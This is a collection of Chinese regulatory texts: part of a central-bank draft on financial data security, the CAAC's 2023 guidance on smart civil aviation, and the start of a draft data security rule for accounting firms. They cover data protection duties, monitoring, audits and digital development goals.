独立于信息系统灾难备份体系以外的备份技术措施。 第三十四条(数据使用保护技术措施要求)数据处理者 应当统一明确第三层级以上数据项的脱敏处理策略,降低脱 敏数据仍可识别至个人、组织的风险。 数据处理者应当采取数字水印等措施,标识信息系统当 前数据使用账号、时间等信息,并在展示后及时清除缓存信 息,提升数据展示、打印等使用过程的安全防护和溯源能力。 数据处理者应当建立终端设备安全管控策略,鼓励针对 使用第三层级以上数据项的终端,采取安全沙箱、终端行为 管控等安全保护措施。 生产环境第二层级以上数据项原则上应当经授权并实 施脱敏处理后才能用于开发测试,确需不经脱敏处理即用于 开发测试的,数据处理者应当履行内部审批手续,并采取与 生产环境一致的安全保护管理和技术措施,确保开发测试数 据安全。 第三十五条(数据加工保护技术措施要求)数据处理者 应当建立统一的加工算法风险评估和控制策略,明确可解释 性、脆弱性等风险对应的缓释措施以及退出算法自动化决策 的替代方案。 第三十六条(数据传输保护技术措施要求)数据处理者 17 应当针对数据传输行为采取下列安全保护技术措施: (一)通过运营商网络传输第二层级以上数据项时,采 取专用线路、虚拟专用网络、安全通信协议等安全保护措施; (二)动态更新记录不同网络安全区域间正常数据传 输对应的网络地址、网络协议通信映射关系,加强安全隔离 与终端设备准入控制; (三)第三层级以上数据项传输至其他数据处理者、传 输至不同数据中心或者传输至运营商网络时,应当优先使用 商用密码技术保障机密性,并根据业务需要使用商用密码技 术加强完整性和抗抵赖性保障,未使用商用密码技术进行传 输保护的,数据处理者应当统一明确相关传输需求场景、支 持此类场景的必要性和应当采取的风险防范措施,并据此开 展; (四)在传输失败或者传输完成后,及时删除不必要的 缓存数据; (五)及时评估调整网络线路的传输承载容量,加强网 络线路和相关软硬件设备的冗余备份。 第三十七条(数据提供保护技术措施要求)数据处理者 应当针对数据提供行为采取下列安全保护技术措施: (一)针对持续性数据提供行为建设较为集中的技术 平台,并采用前置网关或者应用程序接口方式向其他数据处 理者提供数据; 18 (二)提供从其他数据处理者收集获得的数据项,中国 人民银行有明确需公开数据来源要求的,应当以显著方式标 识来源; (三)提供第三层级以上数据项时应当对数据接收方 身份进行认证; (四)采用隐私计算技术提供数据时,应当建立统一的 技术风险评估和控制策略,明确安全可验证性、性能可接受 性等风险对应的缓释措施; (五)对于委托处理情形的数据提供行为,应当纳入信 息科技外包管理体系统一管理。 第三十八条(数据公开保护技术措施要求)数据处理者 应当明确自身已公开数据是否可被自动化搜集的数据访问 控制协议,并采取有效技术措施,保障公开数据不被篡改。 第三十九条(数据删除保护技术措施要求)删除数据涉 及数据存储介质销毁工作时,数据处理者应当建立统一的数 据存储介质销毁策略,明确销毁技术方式和过程监督措施。 存储第三层级以上数据项的存储介质不再使用并且离开数 据处理者控制范围时,应当及时销毁。 数据处理者应当保存数据存储介质销毁日期、销毁介质 识别编号、采取的销毁技术方式、操作执行及复核人等信息 至少三年。 19 第六章 风险监测、评估审计与事件处置措施 第四十条(数据处理活动风险监测)数据处理者应当采 取有效措施,强化数据处理活动安全风险监测和告警,推进 违规数据处理活动阻断技术措施建设,及时做好风险隐患的 溯源排查处置,并核验技术措施的有效性和可靠性。监测告 警规则应当重点关注下列事项: (一)收集、提供的数据存在恶意程序或者法律、行政 法规禁止传输的信息; (二)危害数据安全的漏洞; (三)终端设备和移动介质未经授权存储第三层级以 上数据项; (四)识别到不明用途的数据存储网络地址; (五)未授权的数据使用行为,发生时间、网络地址、 频率、总量存在明显异常的数据使用行为; (六)用户身份认证强度较弱; (七)开发测试环境中使用未授权或者未经脱敏处理 的生产环境数据; (八)对第四层级以上数据项实施加工、提供等行为; (九)异常的网络通信行为和非授权终端设备接入内 部网络的行为; (十)未经商用密码技术加密传输第三层级以上数据 20 项; (十一)终端设备使用互联网邮件、公共即时通讯、互 联网文件传输工具传输第三层级以上数据项或者打印第三 层级以上数据项; (十二)网络线路数据传输承载能力不足; (十三)使用前置网关或者应用程序接口方式提供超 出合同协议约定范围数据的异常行为; (十四)违反数据访问控制协议的公开数据异常访问 行为。 第四十一条(数据安全风险情报监测)数据处理者应当 加强数据安全风险情报的监测,及时核实并做好必要的数据 安全防范处置工作。监测规则应当重点关注下列事项: (一)本单位非公开数据泄漏至互联网的情况; (二)兜售本单位数据的情况; (三)假冒本单位身份非法收集、公开数据,或者对本 单位管理的数据进行造谣传谣的情况; (四)与本单位或者具有关联关系的数据处理者相关 的数据安全负面舆情信息; (五)与本单位合作的数据接收方、委托处理受托人相 关的数据安全负面舆情信息。 第四十二条(数据安全通报预警监测)数据处理者应当 及时接收、核查和处置中国人民银行或其分支机构通报的数 21 据安全风险情报,并根据要求按时反馈核查处置结果。 鼓励数据处理者积极向中国人民银行或其分支机构提 供可共享的数据安全风险情报,提升联防联控效能。 第四十三条(数据安全风险评估)重要数据的数据处理 者应当自行或者委托检测机构,每年组织开展一次全面的数 据安全风险评估工作,于下年度一季度末前向中国人民银行 或其住所地分支机构报送风险评估报告,并按照行政法规要 求向对应的网信部门报送。除法律、行政法规已明确的内容 外,风险评估报告还应当重点评估下列风险,并提出改进应 对措施: (一)数据分类分级实施制度、违规数据处理活动定责 规程和问责处罚措施、数据处理活动全流程数据安全管理制 度和相关操作规程的建设情况; (二)数据安全决策、管理、执行、监督各层面职责划 分和对应岗位设置是否明确、合理,实际职责落实情况; (三)人员培训和日常管理情况; (四)重要数据识别判定情况,处理重要数据的目的、 范围、规模、方式、类型、存储期限和存储地点等情况; (五)重要数据相关的数据处理活动记录信息的真实 性与完整性; (六)重要数据相关的数据处理活动全流程管理和技 术措施执行情况及其有效性; 22 (七)存储重要数据信息系统的网络安全等级保护测 评和问题整改落实情况; (八)重要数据相关的数据处理活动风险监测预警和 溯源排查情况; (九)数据安全事件定级判定标准建设情况,应急预 案、应急处置流程设计与演练实施情况,以及本年度发生的 数据安全事件及处置情况; (十)向其他数据处理者提供重要数据的风险评估报 告。 第四十四条(数据安全审计)数据处理者应当围绕全流 程数据安全管理制度和相关操作规程执行情况、数据安全相 关投诉处理情况,每年至少开展一次与数据安全相关的合规 审计。发生重大以上数据安全事件后,应当及时开展专项审 计,督促数据处理活动过程留痕,安全保障责任落实到人。 第四十五条(数据安全风险评估与审计的安全保障)数 据处理者应当细化管控数据安全风险评估人员和审计人员 使用数据的权限,并采取有效措施确保实施过程安全。鼓励 数据处理者建立技术平台,统一建立数据安全风险评估与审 计的安全管控策略。 数据安全风险评估报告和审计报告不得记录第四层级 以上数据项。报告保存期限不得短于实施过程中使用数据的 存储期限,且最短不得低于三年。 23 委托检测机构、审计机构开展数据安全风险评估或者审 计工作时,数据处理者应当在合同协议中明确其数据安全保 护责任,并指定本单位人员全程参与评估。 第四十六条(数据安全事件定级判定)数据处理者应当 按照国家网络安全事件应急预案有关事件分级要求,综合考 虑影响范围和程度,细化明确各等级数据安全事件对应的定 级判定标准: (一)对于数据被篡改、破坏的事件,定级标准应当考 虑不同业务连续性保障等级信息系统无法正常服务的时长、 影响的业务笔数与金额、影响的个人或者组织数量、损失的 各敏感性层级数据项情况和对应数据规模、带来的舆情影响 等; (二)对于数据泄露事件,定级标准应当考虑涉及的个 人或者组织数量、泄露的各敏感性层级数据项情况和对应数 据规模、带来的舆情影响等; (三)涉及核心数据、重要数据的安全事件,应当分别 定级为特别重大事件、重大事件。 第四十七条(数据安全事件响应处置)数据处理者应当 将数据安全事件纳入网络安全事件应急响应机制统一管理, 制定相关应急预案,做好事件定级、处置、总结、报告、整 改工作,按照规程向中国人民银行或其住所地分支机构、其 他有关主管部门报告事件信息。 24 数据处理者应当每年至少开展一次针对数据安全事件 的应急演练,确保应急处置措施的效率和效果。 合作的数据接收方、委托处理受托人发生与本单位所提 供数据相关的数据安全事件时,数据处理者应当立即开展调 查评估,督促其及时采取补救措施。 第七章 法律责任 第四十八条(监督管理责任履行)中国人民银行及其分 支机构,按照管辖权对数据处理者数据安全保护义务落实情 况开展执法检查。必要时可以与其他有关主管部门联合组织 对数据处理者的执法检查。中国人民银行及其分支机构在执 法检查过程中发现数据处理者的数据处理活动存在较大安 全风险时,依照《中华人民共和国数据安全法》第四十四条 予以处理;发现影响或者可能影响国家安全的数据处理活动 线索时,应当及时报国家数据安全工作协调机制办公室,研 判是否启动国家数据安全审查。 第四十九条(违反数据安全保护义务行为的处理)在本 办法适用范围内,数据处理者未履行数据安全保护义务,有 下列情形之一的,中国人民银行及其分支机构依照《中华人 民共和国数据安全法》第四十五条规定予以处理: (一)未按照本办法第十二条规定,明确或者压实数据 25 安全保护责任; (二)未按照本办法第十三条规定,建立健全全流程数 据安全管理制度; (三)未按照本办法第十四条规定,制定数据安全年度 培训计划,未组织开展相关教育培训; (四)除本办法第五十条、第五十一条规定情形外,未 对应采取本办法第四章和第五章所规定的数据安全保护管 理措施或者技术措施; (五)未按照本办法第四十条、第四十一条规定,做好 数据处理活动风险监测或者数据安全风险情报监测; (六)未按照本办法第四十二条规定,接收、核查、处 置和反馈中国人民银行或其分支机构通报的数据安全风险 情报; (七)重要数据的处理者未按照本办法第四十三条规 定,每年组织开展一次全面的数据安全风险评估并按时报送 风险评估报告; (八)发生数据安全事件时,未按照本办法第四十七条 规定,做好响应处置各项工作。 数据处理者未履行本办法提出的数据安全保护义务,其 他有关法律、行政法规作出规定的,中国人民银行及其分支 机构依照相关规定予以处理。 第五十条(违反规定数据出境行为的处理)中国人民银 26 行及其分支机构执法检查发现数据处理者未履行本办法第 二十六条规定的数据境内存储义务,按照《中华人民共和国 网络安全法》第六十六条规定和有关法律、行政法规的规定 予以处理;发现数据处理者未履行本办法第二十六条规定的 数据出境安全评估申报义务,将相关案件信息移送同级网信 部门,并配合其依法依规予以处理。 第五十一条(违反规定向国际组织或者外国金融管理 部门提供数据行为的处理)数据处理者未履行本办法第二十 七条规定,未经中国人民银行和其他有关主管部门批准,向 国际组织或者外国金融管理部门提供境内存储的数据时,中 国人民银行及其分支机构依照《中华人民共和国数据安全 法》第四十八条第二款规定予以处理;所提供数据涉及个人 信息的,依照《中华人民共和国个人信息保护法》第六十六 条规定予以处理。 第五十二条(非法获取数据行为的处理)中国人民银行 及其分支机构执法检查发现数据处理者存在窃取或者以其 他非法方式获取数据的行为时,将相关案件信息移送同级公 安机关、国家安全机关,并配合其依法依规予以处理。 第五十三条(处理数据损害合法权益行为的处理)中国 人民银行及其分支机构执法检查发现数据处理者开展数据 处理活动排除、限制竞争,或者损害个人、组织合法权益的, 依照《中华人民共和国反不正当竞争法》《中华人民共和国 27 反垄断法》《中华人民共和国消费者权益保护法》等法律, 将相关案件信息移送承担执法职责的有关主管部门,并配合 其依法依规予以处理。 第五十四条(监督管理人员违反规定行为的处理)中国 人民银行及其分支机构人员在监督管理过程中存在玩忽职 守、滥用职权、徇私舞弊情形的,按照法律、行政法规规定 给予处分;涉嫌犯罪的,依法移送监察机关或者司法机关处 理。 第八章 附则 第五十五条(名词定义)术语定义: (一)网络数据,是指通过网络收集、存储、传输、处 理和产生的各种电子数据,表现形式为由一条或者多条信息 记录组成的集合; (二)数据项,是指描述网络数据结构最基本的、不可 分割的单位; (三)结构化数据项,是指具有预定义的抽象描述数据 类型,通常使用数据库二维逻辑表中单一字段指代的数据 项; (四)非结构化数据项,是指没有预定义的抽象描述数 据类型,并且不适宜用数据库二维逻辑表展现的数据项,如 28 图像、视频、音频、文档文件等; (五)数据处理活动,是指数据收集、存储、使用、加 工、传输、提供、公开、删除等活动; (六)数据处理者,是指开展数据处理活动的金融机构 和其他机构; (七)本办法所称“以上”均含本级。 第五十六条(解释权)本办法由中国人民银行负责解 释。国家外汇领域数据安全管理由国家外汇管理局负责,具 体制度可另行制定。 第五十七条(生效期)本办法自 2024 年××月××日 起施行。 29
standards
民 航 局 文 件 民航发 〔 2023〕17 号 中国民用航空局关于印发落实数字中国 建设总体部署 加快推动智慧民航 建设发展的指导意见 民 航 各 地 区 管 理 局 及 监 管 局 , 各 运 输 (通 用 ) 航 空 公 司 、 运 输 (通用 ) 机场公司 、 服务保障公司 , 局属各单位 、 局机关各部门 : 为 贯 彻 落 实 中 共 中 央 、 国 务 院 《数 字 中 国 建 设 整 体 布 局 规 划 》 和 《关 于 构 建 数 据 基 础 制 度 更 好 发 挥 数 据 要 素 作 用 的 意 见 》 文件精神,统筹做好民航大数据建设发展和智慧民航建设工作, 指导行业全面推动数字化转型 、 智能化应用 、 智慧化融合 , 民航 局组织编制了 《关于落实数字中国建设总体部署 加快推动智慧民 航 建 设 发 展 的 指 导 意 见 》。 现 印 发 给 你 们 , 请 结 合 实 际 , 认 真 贯 —1— 彻落实 。 中国民用航空局 2023 年 6 月 27 日 —2— 关于落实数字中国建设总体部署 加快推动智慧民航建设发展的指导意见 为贯彻落实 《数字中国建设整体布局规划 》 和 《关于构建数 据 基 础 制 度 更 好 发 挥 数 据 要 素 作 用 的 意 见 》, 更 好 统 筹 新 型 基 础 设施建设 , 激活数据要素潜能 , 充分发挥智慧民航建设在推进民 航高质量发展中的创新引擎作用 , 制定本意见 。 一 、 总体要求 (一 ) 指导思想 。 坚持以习近平新时代中国特色社会主义思想为指导 , 深入贯 彻党的二十大精神 , 坚持稳中求进工作总基调 , 完整 、 准确 、 全 面贯彻新发展理念,加快构建新发展格局,着力推动高质量发 展,统筹发展和安全,强化系统观念和底线思维,遵循基础夯 实 、 数字赋能 、 能力提升 、 环境优化的战略路径 , 全面提升智慧 民航建设的系统性 、 协同性和安全性 , 推动行业数字化转型 、 智 慧化运行 , 更好谱写交通强国民航新篇章 , 为推进中国式现代化 贡献力量 。 (二 ) 工作原则 。 深化改革,创新引领。加强党对智慧民航建设的全面领导, 加快建立适应民航数字化发展的制度体系 , 以数字化发展驱动流 程再造 、 组织模式变革 , 强化企业创新主体地位 , 加快关键核心 —3— 技术突破 , 着力推动数字技术应用创新 。 系统布局 , 数字赋能 。 加强系统化布局 、 一体化推进 , 围绕 民航安全生产 、 运输服务 、 绿色发展 、 行业治理和文化建设 , 强 化应用项目落地牵引和场景示范驱动,推进数据资源融通共享, 激发数据要素价值 。 自主可控 , 安全可靠 。 贯彻落实总体国家安全观 , 严守数字 安全底线 , 切实保障民航网络安全和数据安全 , 防范化解数字化 条件下的各类风险 , 深化安全可靠应用 , 提升重点领域的自主可 控能力 。 开放合作 , 互利共赢 。 加强民航与产业跨界融合 , 推进民航 数字领域规则 、 规制 、 管理 、 标准等国际交流合作 , 构建共商共 建共治共享共惠的民航数字化发展生态,拓展互利共赢合作新 局面 。 (三 ) 主要目标 。 到 2027 年 , 智 慧 民 航 建 设 数 字 化 转 型 取 得 重 要 进 展 , 数 字 基础设施高效联通 , 数字安全保障能力全面提升 , 数字政府建设 成效显著,数字化发展环境更加完善,数字技术应用创新活跃, 数据资源融合共享 , 数据要素价值有效释放 , 全面推动民航创新 能力 、 安全水平 、 运行效率 、 服务质量和治理效能大幅提升 。 到 2035 年 , 智 慧 民 航 建 设 数 字 化 发 展 水 平 进 入 世 界 前 列 , 数据资源和要素体系完备 , 数字技术叠加效应 、 数据要素乘数效 应全面释放 , 民航数字化生态圈全面形成 , 为民航实现安全 、 便 —4— 捷 、 高效 、 绿色 、 经济发展提供有力支撑 。 二 、 夯实智慧民航建设数字化基础 数字基础设施和数据资源体系是智慧民航建设的两大基础。 要充分发挥数字基础设施的底座功能和数据资源的核心要素作 用 , 以数字感知 、 数据决策 、 精益管理 、 精心服务为目标 , 完善 民航数字基础设施发展布局 , 打通行业主体基础设施之间的 “大 动脉 ”, 畅通数据资源 “大循环 ”。 (一 ) 构建泛在智联的民航数字基础设施 。 1.适 度超 前建 设网络 基础 设施 。 优 化民航 通信 网络 资源 结 构,加快推进北斗系统应用和新一代航空宽带通信基础设施建 设 , 提 高 民 航 数 据 传 输 能 力 和 承 载 能 力 。 深 入 推 进 IPv6 应 用 , 开展基于 5GAe roMACS 技术的 “机 - 车 - 场道 - 设施 ” 协同运 行 , 推进空管 、 机场 、 航空公司 、 服务保障单位等各主要运行要 素全面物联 , 探索研究 6G 等新技术在民航领域的应用 。 2.系统优化数据基础设施布局 。 强化民航领域数据中心集群 顶层设计 , 推动民航大数据中心与民航各领域数据中心间网络直 连和组网互联,构建集约化、规模化、绿色化民航数据中心集 群,实现跨部门、跨业务、跨区域、跨层级数据资源综合利用, 提升数据交互能力 。 提升行业安全生产运行关键系统和核心设备 保障能力 , 加强容灾备份建设 。 3.整 体提升 应用基 础设施 能力 。 推进传 统基础 设施数 字化 、 智能化改造 , 加强行业重要数据资源和信息系统上云部署 。 建设 —5— 政务 、 空管 、 运行监控 、 市场服务 、 航空物流等重点领域应用基 础设施体系 , 增强数字感知 、 边缘计算和智能分析能力 , 深化人 工智能 、 区块链等技术融合应用 。 (二 ) 建立高效利用的民航数据资源体系 。 1.健全民航数据管理体制机制 。 发挥智慧民航建设体制机制 优势,加快构建民航数据基础制度体系。建立健全数据管理机 构 , 完善管理机制 , 明确行业管理部门 、 运行主体 、 第三方服务 机构职责定位,充分发挥各方功能作用,提升数据管理整体 效能 。 2.构建民航数据资源体系 。 研究建立行业重点领域一体化数 据目录和动态管理机制 。 面向民航业务发展需求 , 推进业务主体 和系统间数据集成和共享 , 加强主数据全生命周期管理 , 构建元 数据管理机制和管理规范。加快推动行业数据资源分类分级管 理 , 推进数据集 、 算法模型 、 开发模型等资源开放利用 。 3.激发数据要素价值潜能 。 落实国家数据基础制度要求 , 明 确行业数据权益权属 , 推动公共数据 、 企业数据和个人数据依法 合规高效利用 。 研究建立民航数据资产登记 、 价值评估核算等制 度 , 探索建立行业数据市场化流通新模式 , 依托公共服务交易平 台推动民航数据有序流通 , 提升民航数据要素资源效益 。 三 、 全面推进智慧民航建设数字化赋能 民航安全生产 、 航空服务 、 绿色发展 、 政府监管 、 行业文化 是 数 字 化 赋 能 民 航 高 质 量 发 展 的 五 个 重 要 领 域 。 以 “出 行 一 张 —6— 脸 、 物流一张单 、 通关一次检 、 运行一张网 、 监管一平台 ” 为场 景驱动 , 筑牢安全发展底线 , 坚持智慧民航建设主线 , 拓展绿色 发展上线 , 构建产业联盟阵线 , 加快民航数字化转型升级 , 提高 行业全要素生产率 。 (一 ) 推进生产运行安全高效 。 1.加强机场全域高效协同 。 建立基于智能建造 、 数字孪生的 规划建设运营一体化模式 。 强化数据信息在机场运行安全领域的 应用 , 打通机场各类系统信息和数据共享渠道 , 实现对运行安全 态势的实时感知 。 推进航班地面保障智能部署 , 加强场内运行态 势精准监控与预测 , 实现各主体各单元高效协同运行 。 推进无人 驾驶设备和智能作业装备应用 , 加强航站楼自助设备应用 , 强化 智慧安防体系建设。推动航空物流作业全过程自动化、数字化 管控 。 2.推进空管全过程精细管控 。 加强航班运行态势监控 , 推进 运行主体间数据共享 , 优化协同运行机制 , 实现全国航班一体化 指挥调度 。 探索空域运行效能自主评估 , 加强不同飞行阶段精细 化管控 , 研究推进四维航迹运行 , 提升空域容量和管控效率 。 探 索基于算力的航班融合运行和有人无人融合运行 , 加快推进新一 代空中交通管理系统开发验证 。 3.推动航空公司全周期智能管理 。 提升大型网络型航空公司 生产运行 、 营销服务 、 经营管理 、 机组资源管理等数字化智能化 水平 , 提高资源配置效率和效益 。 推进航班运行全流程 、 全要素 —7— 动态风险评估与预警 , 推动运力快速调度与地面保障资源精准匹 配 , 提升突发事件应急处置能力和航班恢复能力 。 推进航空器状 态智能监控与健康管理,提升航空器关键核心部件可靠性分析、 故障诊断与维修决策能力 。 4.推进民航与数字产业深入融合 。 引导智能装备制造 、 软件 开发、通信运营等企业协同开展关联产品研发和技术标准制定, 吸引数字平台型企业参与民航服务形态创新 。 鼓励民航信息服务 企业加强关键核心技术攻关 , 提升行业数字化转型解决方案自主 能力 。 提升航油保障智能化水平 , 构筑航材数字化保障体系 。 (二 ) 推进航空服务普惠便捷 。 1.构 建 便 捷 舒 心 的 出 行 服 务 体 系 。 优 化 订 票 值 机 等 线 上 服 务 , 打造运输 、 旅游 、 娱乐 、 购物等一体化产品体系 。 加快数字 技术创新应用 , 缩短旅客整体出行时间 , 推进无感安检 、 快捷通 关、无忧签转及线上线下融合出行服务。推进机上互联网服务。 推广行李直挂和全流程跟踪 。 2.打造高效航空物流服务体系 。 推动航空物流与其他运输方 式、海关标准对接、安检互认,加强货品、单证、载具、安检、 结算等重点领域信息交互联通 , 打造一单到底的智慧物流联运服 务体系,促进物流提质降本增效。构建货物提取时间精准可控、 位置实时可查 、 状态全面感知的全流程追踪服务 , 提高准时达服 务可靠性 。 3.扩展丰富通用航空业态 。 加快建设低空飞行服务站 , 推进 —8— 通用航空航行情报资料数字化 , 构建低空飞行数字化保障服务体 系 。 加大通用航空新兴消费服务产品精准化 、 个性化投放 。 促进 通用航空与应急、医疗、旅游、交通等智慧城市产业融合发展。 拓展无人驾驶航空器在低空运输 、 应急救援 、 航空拍摄 、 国土测 绘 、 农林植保等场景应用 。 (三 ) 推进绿色发展集约低碳 。 1.推进机场环境智慧治理 。 加快推动飞机噪声智能监测 、 预 测 、 分析及治理 。 鼓励机场利用物联网 、 大数据和云计算等数字 技术开展污水 、 污物 、 空气质量智能监测和精准治理 。 提高民航 碳监测 、 报告 、 核查体系数字化水平 , 推进符合国情和行业发展 阶段的航空碳排放市场建设 。 2.推进民航数字化绿色化协同转型 。 综合运用数字技术 , 提 升机场规划设计、建设维护、地面运行和能源管理等绿色化水 平。着力提升管制服务、气象预报、临时航路使用等决策能力, 提高空域资源利用效率。引导航空公司优化运力调配、飞行控 制 、 运输组织 , 提升绿色运行水平 。 加强数据中心等数字基础设 施绿色低碳发展 , 提升清洁能源应用水平 。 (四 ) 推进行业治理精准协同 。 1.创新民航安全监管 。 加快基于数据驱动 、 风险管控的安全 监管模式创新 , 建立不同维度的分级分类指标体系 , 实施差异化 精准监管,推动民航安全监管向事前预防转变。建立以远程监 管 、 移动监管 、 预警防控为特征的非现场监管体系 。 研究建立安 —9— 全监管绩效指标 , 提升风险隐患识别精准度 。 2.融合创新市场监测 。 加强航权 、 航线航班 、 航班时刻 、 运 输价格 、 服务质量 、 节能减排等数据采集汇聚 、 融合共享 , 建立 航空运输市场画像模型 , 构建航空运输市场监测评价体系 , 强化 经济运行监测和形势研判 , 提高要素资源配置效率 , 维护市场秩 序 , 保护消费者权益 , 提升行业宏观调控能力 。 3.加 强 数 字 政 务 建 设 。 发 挥 政 务 服 务 平 台 枢 纽 作 用 , 提 升 “一 网 通 办 ” 服 务 能 力 , 推 进 民 航 领 域 电 子 证 照 扩 大 应 用 范 围 。 提升政府网站智能化服务能力 , 推动公共数据安全有序开放 、 公 共服务协同精准直达 。 打造一体化协同办公体系 。 推进政务数据 与监管数据 、 运行数据有机融合 , 丰富辅助决策手段 , 提升政务 监管智能化水平 。 (五 ) 推进文化建设自信繁荣 。 1.促进民航文化数字化发展 。 弘扬伟大建党精神 , 践行社会 主义核心价值观 , 传承民航优良传统 , 着力增强民航文化数字生 产能力 。 利用数字化技术赋能民航安全文化 、 服务文化 、 创新文 化和诚信文化建设 。 创新开发民航数字文化 , 挖掘凝练智慧民航 建设实践经验 , 打造具有中国特色的航空文化新业态新模式 。 2.增强民航文化传播力 。 加快民航报社 、 民航出版社全媒体 建设 , 鼓励行业企事业单位构建民航数字化文化传播矩阵 , 宣传 行业文化 、 讲好民航故事 。 支持推出更多反映民航历史和现实题 材的高质量数字文化作品 , 推动民航文化输出 。 用好民航发展论 — 10 — 坛、民航科教创新成果展、民航智见等,打造线上线下一体化、 在线在场相结合的数字文化传播载体 。 四 、 提升智慧民航建设数字化关键能力 技术创新、数字安全是智慧民航建设的核心动力和基本保 障 。 要深入实施创新驱动发展战略 , 加快提升行业全链条自主可 控能力,完善网络安全和数据安全治理,筑牢行业发展安全 屏障 。 (一 ) 强化民航数字技术创新 。 1.攻关民航数字关键技术 。 开展业务领域智能融合关键技术 研究 , 着力攻克精准监管 、 智能建养 、 协同运行 、 风险预警等技 术 。 推动数字技术在无人 (少人 ) 运行 、 机场运营仿真优化 、 客 货安检智能化 、 航空器维修与健康管理等场景的融合应用 。 面向 国产大飞机 、 北斗 、 新一代航空宽带通信等 , 围绕智慧运行场景 做好预先研究和技术储备 。 2.提升民航全链条安全可靠能力 。 加强民航安全 、 运行 、 服 务等领域关键信息基础设施的核心装备 、 基础软件 、 应用软件的 安全保障 。 加强与航空制造 、 智能装备 、 数字产业等行业的自主 创新技术协同 , 推动空管 、 航空公司 、 旅客服务等领域信息系统 和装备原创性研发 。 3.健 全民航 行业协 同创新 体系 。 强化企 业的创 新主体 地位 , 提升行业主管部门调控能力和引导作用 , 健全行业关键技术集中 攻关机制 , 强化创新链 、 服务链和产业链有机衔接 。 建立民航数 — 11 — 字化成果转化闭环路径 , 健全科技成果转化收益分配机制 , 加速 行业数字化成果转化 。 (二 ) 筑牢民航数字安全屏障 。 1.切实保障网络安全 。 完善民航网络安全管理体制机制 , 健 全行业关键信息基础设施安全保护 、 网络安全等级保护相关制度 和技术标准 。 建立行业网络安全监测预警和共享平台 。 提高行业 重要生产运营系统的网络安全应急处置能力 , 加强容灾备份 。 2.增 强 数 据 安 全 保 障 能 力 。 建 立 数 据 分 类 分 级 保 护 基 础 制 度 , 按 照 “谁 管 业 务 , 谁 管 业 务 数 据 , 谁 管 数 据 安 全 ” 的 原 则 , 完善数据安全工作体系 , 健全数据目录管理 、 监测预警 、 全生命 周期管理等机制 , 加强数据安全应急处置 。 五 、 优化智慧民航建设数字化环境 数字治理是智慧民航建设的基本支撑 , 数字领域国际合作是 民航高水平对外开放的重要纽带 。 要完善行业数字领域政策和技 术标准体系 , 着力加强行业数据治理 , 加强民航数字领域对外交 流 , 拓展国际合作空间 。 (一 ) 建设公平规范的数字治理生态 。 1.构建政策标准体系 。 强化顶层设计 , 制定实施智慧民航建 设数据管理政策标准体系 , 加快民航数据基础制度建设 。 制定生 物特征识别 、 无人驾驶设备等行业应用规范 , 加强行业典型应用 信息系统成熟度模型等方面标准制定 。 加强与相关产业的标准协 同 , 深度参与航空器制造 、 卫星导航 、 无线电管理等领域国内外 — 12 — 标准制订 。 2.优化数字治理环境 。 加强行业主管部门调控能力和引导作 用 , 支持有条件的单位成立数字化转型机构 , 在严守安全底线前 提下 , 给予市场主体充足创新发展空间 , 激发行业数字化建设活 力 。 推动行业数字化领域反垄断 、 反不正当竞争 , 促进行业健康 发展 。 (二 ) 构建开放共赢的国际合作格局 。 1.深化国际交流合作 。 推动共建 “一带一路 ” 民航数字基础 设施互联互通,促进技术标准、规划部署和建设运营等方面合 作 , 高 质 量 共 建 “数 字 丝 绸 之 路 ”。 争 取 科 技 部 “政 府 间 国 际 科 技创新合作 ” 等专项支持 , 在民航数据共享 、 绿色发展等领域设 立民航数字科技国际合作项目 。 2.拓展国际合作空间 。 充分利用国际民航组织 、 国际行业协 会 、 区域民航合作机制以及中欧 、 中美等多双边交流场合 , 协商 拓展民航数字领域治理合作方向 。 注重民航大数据与智能化应用 等相关领域标准体系国际交流与推广,统筹做好与国际标准对 接 , 推动中国方案和中国标准国际化 , 支持智慧民航优势项目走 出去 , 增强国际话语权 。 六 、 组织实施保障 (一 ) 加强组织领导 。 加强党对智慧民航建设的全面领导 , 充分发挥智慧民航建设 领导小组统筹协调、整体推进、督促落实作用,谋划重大战略、 — 13 — 制定重大政策 、 部署重大任务 。 民航各单位要加强组织领导 , 提 高政治站位 , 积极推进本单位数字化发展和智慧民航建设工作 。 (二 ) 健全实施机制 。 智慧办和数安办负责建立健全落地实施机制 , 制定年度计划 和工作要点,明确任务分工,加强重大任务和重大工程跟踪调 度 , 抓好督促落实 , 做好年度总结 。 各地区管理局 、 各直属单位 要细化工作任务落实 , 按年度向民航局报告实施情况 。 (三 ) 保障资金投入 。 发挥政府投资的支持引导作用,聚焦民航数字关键技术创 新、重大数字基础设施、数据资源体系、数字安全等重点领域, 引导民航各单位加大投入。鼓励社会资本规范参与智慧民航建 设 。 加强各类资金统筹引导 , 提升投入质量和效益 。 (四 ) 强化人才支撑 。 民航院校要在课程中增加数字中国 、 智慧民航建设内容 , 增 强党员领导干部 、 公务员 、 在校师生的数字思维 、 数字认知 、 数 字技能 。 聚焦重大科研方向需求 , 加大战略科学家 、 科技领军人 才、拔尖人才及创新团队的培养和引进,打造多层次数字人才 队伍 。 — 14 — 民航局综合司 2023 年 6 月 28 日印发
standards
附件1 会计师事务所数据安全管理暂行办法 (征求意见稿) 第一章 总则 第一条为保障会计师事务所数据安全,规范会计师事务所数据处理活动,根据《中华人民共和国注册会计师法》、《中华人民共和国数据安全法》、《中华人民共和国网络安全法》等法律法规,制定本办法。 第二条在中华人民共和国境内依法设立的会计师事务所开展下列审计业务相关数据处理活动的,适用本办法: (一)为上市公司以及非上市的国有金融机构、中央企业等提供审计服务的; (二)开展跨境审计业务的。 第三条本办法所称数据,是指会计师事务所执行审计业务过程中,从外部获取和内部生成的任何以电子或者其他方式对信息的记录。 数据安全,是指通过采取必要措施,确保数据持续得到有效保护和合法利用。 第四条会计师事务所承担本机构的数据安全主体责任,履行数据安全保护义务。 第五条国务院财政部门会同国家网信部门负责全国会计师事务所数据安全监管工作,省、自治区、直辖市人民政府财政部门会同省级网信部门负责本行政区域内会计师事务所数据安全监管工作。 第六条注册会计师协会应当加强行业自律,指导会计师事务所加强数据安全保护,提高数据安全管理水平。 第二章 数据管理 第七条会计师事务所应当在下列方面履行本所数据安全管理责任: (一)建立健全数据安全管理制度,完善数据运营和管控机制; (二)健全数据安全管理组织架构,明确数据安全管理权责机制; (三)实施与业务特点相适应的数据分类分级管理; (四)建立数据权限管理策略,按照最小授权原则设置数据访问和处理权限,定期复核并按有关规定保留数据访问记录; (五)组织开展数据安全教育培训; (六)法律法规规定的其他事项。 第八条会计师事务所的首席合伙人(主任会计师)是本所数据安全负责人。 